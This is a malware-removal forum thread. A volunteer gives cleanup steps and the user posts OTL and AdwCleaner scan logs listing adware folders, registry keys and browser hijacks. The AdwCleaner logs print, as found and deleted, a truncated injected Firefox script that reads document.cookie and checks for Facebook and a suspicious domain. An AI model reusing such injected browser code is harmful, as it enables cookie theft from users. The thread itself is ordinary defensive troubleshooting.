[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:43:20 | 000,381,216 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settings.sfm
[2014/05/19 12:39:10 | 000,445,016 | ---- | M] (Creative Labs) -- C:\Windows\System32\wrap_oal.dll
[2014/05/19 12:39:09 | 000,000,087 | RH-- | M] () -- C:\Windows\ctfile.rfc
[2014/05/19 12:06:34 | 000,002,057 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/05/19 11:20:19 | 000,001,975 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/19 10:46:11 | 000,000,953 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2014/05/19 10:45:36 | 000,000,917 | ---- | M] () -- C:\Users\Ken\Desktop\Dropbox.lnk
[2014/05/19 10:36:53 | 000,001,810 | ---- | M] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | M] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/05/19 21:18:39 | 000,000,275 | ---- | C] () -- C:\Windows\wininit.ini
[2014/05/19 12:45:34 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:45:31 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:40:12 | 000,029,820 | ---- | C] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,011,564 | ---- | C] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settings.sfm
[2014/05/19 11:11:50 | 000,218,228 | ---- | C] () -- C:\Windows\System32\WFP.TMF
[2014/05/19 10:36:53 | 000,001,810 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | C] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[2014/05/19 10:36:52 | 000,036,864 | ---- | C] () -- C:\Windows\runSW.exe
[2011/04/13 09:54:46 | 000,000,000 | ---- | C] () -- C:\Users\Ken\AppData\Roaming\wklnhst.dat
[2010/12/20 22:50:46 | 014,835,712 | ---- | C] () -- C:\ProgramData\sandra.mda
[2010/09/19 03:06:28 | 000,001,356 | ---- | C] () -- C:\Users\Ken\AppData\Local\d3d9caps.dat
[2009/02/04 01:21:42 | 000,000,000 | ---- | C] () -- C:\ProgramData\LauncherAccess.dt
[2008/01/09 20:34:03 | 000,817,982 | ---- | C] () -- C:\ProgramData\LUUnInstall.LiveUpdate
[2008/01/02 18:37:37 | 000,000,132 | ---- | C] () -- C:\Users\Ken\BackupResult.DAT
[2008/01/02 17:50:03 | 000,004,608 | ---- | C] () -- C:\Users\Ken\Drive_K.BJF
[2007/12/05 11:52:50 | 000,141,824 | ---- | C] () -- C:\Users\Ken\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/12/04 11:33:31 | 007,602,176 | ---- | C] () -- C:\Users\Ken\NTUSER.bak
 
========== ZeroAccess Check ==========
 
[2006/11/02 08:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/25 09:26:04 | 011,587,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/04/11 02:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/04/11 02:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2010/09/15 14:32:25 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\abelhadigital.com
[2007/12/04 11:40:14 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Acer
[2011/10/01 12:24:48 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\DAEMON Tools Lite
[2014/05/20 09:55:48 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Dropbox
[2014/05/19 10:45:56 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\DropboxMaster
[2010/08/19 20:11:19 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\FreeBurner
[2012/04/11 14:42:57 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\ImgBurn
[2007/12/04 11:40:13 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Leadertech
[2009/02/07 00:55:34 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Leawo
[2012/05/30 21:05:34 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Motorola
[2012/05/30 21:07:14 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Motorola Mobility
[2011/10/01 12:04:03 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\OpenDNS Updater
[2014/05/19 22:07:25 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Oracle
[2009/02/04 18:42:57 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Samsung
[2009/03/14 18:20:29 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Skinux
[2010/11/11 19:45:48 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\TeamViewer
[2011/04/13 09:54:47 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Template
[2010/11/26 00:13:46 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Thunderbird
[2011/03/17 22:56:32 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Tific
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 104 bytes -> C:\ProgramData\TEMP:5C321E34

< End of report >
 

 




#2
Valinorum


    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)

:welcome:

My name is Valinorum and I will be the acolyte today. Before we proceed, please acquaint yourself with the following:
  • Please do not create any new threads on this while we are working on your system as it wastes another volunteer's time. If you are being helped/have solved the issue/no longer wish to continue, notify me in your reply and I will quickly close this thread. Failing to comply will result in denial of future assistance.
  • Please do not install any new software while we are working on this system as it may hinder our process.
  • Malware removal is a complicated process so don't stop following the steps even if the symptoms are not found. Keep up with me until I declare you clean.
  • Please do not try to fix anything without being asked.
  • Please do not attach your logs or put them inside code/quote tags. Do a Copy/Paste of the entire contents of the log file and submit it inside your post unless directed otherwise.
  • Please print or save the instructions I give you for quick reference. We may be using Safe mode which will cut you off from internet and you will not always be able to access this thread.
  • Back up your data. I will not knowingly suggest any course that might damage your system, but sometimes malware infections are so severe that the only option we have is to re-format and re-install the operating system.
  • If you are confused about any instruction stop and ask. Do not keep on going.
  • Do not repeat the steps if you face any problems.
  • I am not omniscient. There are things even I cannot foresee. But what I know took years to learn and perfect. This site is run by volunteers who help people in need in their own free time. I would ask you to respect their time and be patient, as sometimes real life demands our time and replies to you can be delayed.
  • Private Message (PM) me if and only if I have not responded to your thread within three days or your query is off-topic and personal. Do not PM me under any other circumstances. Your thread is the only medium of communication.
  • The fixes are for your system only. Please refrain from using these fixes on other systems as it may do serious damage.
 
  • Step #1 Fix with AdwCleaner
    • Download AdwCleaner by Xplode to your Desktop from the following link.
    • Right-click on AdwCleaner.exe and choose Run as administrator;
    • Click on Scan and let the program run unhindered;
    • When done, click on Clean and allow the system to reboot after it is done;
    • A log will be opened automatically after the restart;
    • Copy and Paste the contents of this log in your reply.
 
  • Step #2 Fix with Junkware Removal Tool
    Download Junkware Removal Tool by thisisu to your Desktop from the link below.
    Download Link 1
    Download Link 2
    • Disable your anti-virus to avoid potential conflicts. For more information, please acquaint yourself with this article;
    • Run the program either by double-clicking (Windows XP) or right-clicking and choosing Run as administrator (Windows Vista and above);
    • Please be patient as the tool cleans your system;
    • After completion of the process, a log named JRT.txt will automatically open and is saved to your Desktop;
    • Copy and Paste the contents of the log in your next reply.
 
  • Step #3 Scan with OTL
    • Re-run OTL.exe.
    • From the Extra Registry choose Use SafeList.
    • Copy and Paste the following code inside the Custom Scans/Fixes box;
      netsvcs
      BASESERVICES
      %SYSTEMDRIVE%\*.exe
      dir "%systemdrive%\*" /S /A:L /C
      /md5start
      services.*
      explorer.exe
      winlogon.exe
      Userinit.exe
      svchost.exe
      /md5stop
      CREATERESTOREPOINT
    • Click the Run Scan button;
    • After the scan two logs will be produced;
    • Copy and paste the content of the logs in your next reply
 
  • Required Log(s):
    • AdwCleaner Log
    • Junkware Removal Tool Log
    • OTL Log(s) --
      • OTL.txt
      • Extras.txt
Regards,
Valinorum

#3
Kenjesse


    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Thanks for the fast reply... doing scans now will post logs directly.



#4
Kenjesse


    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Logs are as follows (there were 3 AdwCleaner logs)

 

 

# AdwCleaner v3.210 - Report created 20/05/2014 at 13:54:39
# Updated 19/05/2014 by Xplode
# Operating System : Windows Vista ™ Home Premium Service Pack 2 (32 bits)
# Username : Ken - KEN-HOME
# Running from : C:\Users\Ken\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Found : C:\Program Files\Conduit
Folder Found : C:\Program Files\SearchProtect
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog
Folder Found : C:\Users\Ken\AppData\Local\SwvUpdater
Folder Found : C:\Users\Ken\AppData\LocalLow\Conduit

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\Software\SmartBar
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Classes\driverscanner
Key Found : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3097F293-D232-474E-ABEA-469F80D3A924}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B8671A7-FA01-4452-AB99-C4728E98247D}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\Software\Uniblue
Value Found : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16545


-\\ Mozilla Firefox v4.0 (en-US)

[ File : C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\prefs.js ]

Line Found : user_pref("CT3279141_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1359865252627,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Found : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Found : user_pref("ct3279141.UserID", "UN28102926548955477");
Line Found : user_pref("extensions.510db82b7af87.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
Line Found : user_pref("smartbar.machineId", "Q1E1MICY+X/UYZGHUW8FG1RMXX7RAR9QXY7BWSTQPZAC+YJBB+8MDV05S8R2S730VTWVZ2HOLPQDDL9GVKHUNG");

-\\ Google Chrome v34.0.1847.137

[ File : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Extension] : knfhfghnfdabbalddnnbdjmjomfgjbog

*************************

AdwCleaner[R0].txt - [4590 octets] - [20/05/2014 13:54:39]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [4650 octets] ##########
 

# AdwCleaner v3.210 - Report created 20/05/2014 at 13:55:20
# Updated 19/05/2014 by Xplode
# Operating System : Windows Vista ™ Home Premium Service Pack 2 (32 bits)
# Username : Ken - KEN-HOME
# Running from : C:\Users\Ken\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Found : C:\Program Files\Conduit
Folder Found : C:\Program Files\SearchProtect
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog
Folder Found : C:\Users\Ken\AppData\Local\SwvUpdater
Folder Found : C:\Users\Ken\AppData\LocalLow\Conduit

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\Software\SmartBar
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Classes\driverscanner
Key Found : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3097F293-D232-474E-ABEA-469F80D3A924}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B8671A7-FA01-4452-AB99-C4728E98247D}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\Software\Uniblue
Value Found : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16545


-\\ Mozilla Firefox v4.0 (en-US)

[ File : C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\prefs.js ]

Line Found : user_pref("CT3279141_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1359865252627,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Found : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Found : user_pref("ct3279141.UserID", "UN28102926548955477");
Line Found : user_pref("extensions.510db82b7af87.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
Line Found : user_pref("smartbar.machineId", "Q1E1MICY+X/UYZGHUW8FG1RMXX7RAR9QXY7BWSTQPZAC+YJBB+8MDV05S8R2S730VTWVZ2HOLPQDDL9GVKHUNG");

-\\ Google Chrome v34.0.1847.137

[ File : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Extension] : knfhfghnfdabbalddnnbdjmjomfgjbog

*************************

AdwCleaner[R0].txt - [4730 octets] - [20/05/2014 13:54:39]
AdwCleaner[R1].txt - [5804 octets] - [20/05/2014 13:55:20]

########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [5864 octets] ##########
 

# AdwCleaner v3.210 - Report created 20/05/2014 at 13:56:32
# Updated 19/05/2014 by Xplode
# Operating System : Windows Vista ™ Home Premium Service Pack 2 (32 bits)
# Username : Ken - KEN-HOME
# Running from : C:\Users\Ken\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Vaudix
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Program Files\SearchProtect
Folder Deleted : C:\Users\Ken\AppData\Local\SwvUpdater
Folder Deleted : C:\Users\Ken\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog
[!] Folder Deleted : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog

***** [ Shortcuts ] *****


***** [ Registry ] *****

[#] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3097F293-D232-474E-ABEA-469F80D3A924}
[#] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B8671A7-FA01-4452-AB99-C4728E98247D}
Key Deleted : HKLM\SOFTWARE\Classes\driverscanner
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKLM\Software\Uniblue
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16545


-\\ Mozilla Firefox v4.0 (en-US)

[ File : C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\prefs.js ]

Line Deleted : user_pref("CT3279141_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1359865252627,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Deleted : user_pref("ct3279141.UserID", "UN28102926548955477");
Line Deleted : user_pref("extensions.510db82b7af87.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
Line Deleted : user_pref("smartbar.machineId", "Q1E1MICY+X/UYZGHUW8FG1RMXX7RAR9QXY7BWSTQPZAC+YJBB+8MDV05S8R2S730VTWVZ2HOLPQDDL9GVKHUNG");

-\\ Google Chrome v34.0.1847.137

[ File : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Extension] : knfhfghnfdabbalddnnbdjmjomfgjbog

*************************

AdwCleaner[R0].txt - [4730 octets] - [20/05/2014 13:54:39]
AdwCleaner[R1].txt - [5944 octets] - [20/05/2014 13:55:20]
AdwCleaner[S0].txt - [4922 octets] - [20/05/2014 13:56:32]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4982 octets] ##########
 

 

OTL logfile created on: 5/20/2014 2:17:11 PM - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Ken\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
